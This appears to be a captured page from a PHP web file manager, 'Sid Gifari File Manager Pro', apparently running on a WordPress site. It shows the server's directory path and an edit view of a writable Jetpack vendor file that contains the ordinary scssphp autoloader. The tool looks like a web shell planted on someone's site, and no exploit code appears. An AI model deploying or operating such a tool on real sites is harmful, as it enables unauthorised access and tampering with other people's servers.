🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 11:41:18 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
jetpack
/
vendor
/
scssphp
/
scssphp
📍 /home/therahul/thedasstores.com/wp-content/plugins/jetpack/vendor/scssphp/scssphp
🔄 Refresh
✏️
Editing: scss.inc.php
Writable
<?php if (version_compare(PHP_VERSION, '5.6') < 0) { throw new \Exception('scssphp requires PHP 5.6 or above'); } if (! class_exists('ScssPhp\ScssPhp\Version')) { spl_autoload_register(function ($class) { if (0 !== strpos($class, 'ScssPhp\ScssPhp\\')) { // Not a ScssPhp class return; } $subClass = substr($class, strlen('ScssPhp\ScssPhp\\')); $path = __DIR__ . '/src/' . str_replace('\\', '/', $subClass) . '.php'; if (file_exists($path)) { require $path; } }); }
💾 Save Changes
❌ Cancel